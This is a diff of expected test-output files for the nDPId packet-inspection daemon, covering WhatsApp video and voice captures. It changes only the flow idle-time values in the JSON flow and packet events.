-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"} -02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQ
CrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQPewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6ADJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7560000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"thread_ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01213{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"} 
+02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQCrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQ
PewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6ADJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaxMYAAEARfZvAqAIMHw1WMNG4DZYAhm0oAAMAaiESpEIMCJFuDJOtHXjqlExAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 
00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
@@ -35,8 +35,8 @@ 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455770313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455770313,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClcA8AAAIRlYrAqAIM7\/\/\/+shNB2wAkeqFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455772049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1561455772049,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqwAAP8RG\/kAAAAA\/\/\/\/\/wBEAEMBNNtQAQEGAH5K8tcAMwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00734{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 
@@ -77,7 +77,7 @@ 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":493,"flow_first_seen":1561455769789,"flow_last_seen":1561455792270,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":1139,"flow_tot_l4_payload_len":227969,"flow_avg_l4_payload_len":462,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455792270,"flow_last_seen":1561455795277,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":65025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":893,"flow_first_seen":1561455781352,"flow_last_seen":1561455792065,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1293,"flow_tot_l4_payload_len":647331,"flow_avg_l4_payload_len":724,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1561455767339,"flow_last_seen":1561455795283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1561455781247,"flow_last_seen":1561455791996,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":792,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455795283,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1567,"source":"wa_video.pcap","alias":"nDPId-test","packets-captured":1567,"packets-processed":1567,"total-skipped-flows":0,"total-l4-data-len":891931,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":14,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":14,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":82,"global_ts_msec":1561455795283} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/wa_voice.pcap.out b/test/results/wa_voice.pcap.out index 595d40fa5..9ac483da2 100644 --- a/test/results/wa_voice.pcap.out +++ b/test/results/wa_voice.pcap.out 
@@ -10,39 +10,39 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455687991,"flow_last_seen":1561455687991,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1561455687991,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"},"dns": {"query":"g.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455688018,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1561455688018,"pkt":"kLkxKPrKxiwDYGpkCABFAABj38gAAEARFWTAqAIBwKgCDAA17V0ATz5mDHeBgAABAAIAAAAAAWcId2hhdHNhcHADbmV0AAABAAHADAAFAAEAAArzAAsEY2hhdANjZG7ADsAsAAEAAQAAAEEABJ3wFDU="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455687991,"flow_last_seen":1561455688018,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1561455688018,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":60765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 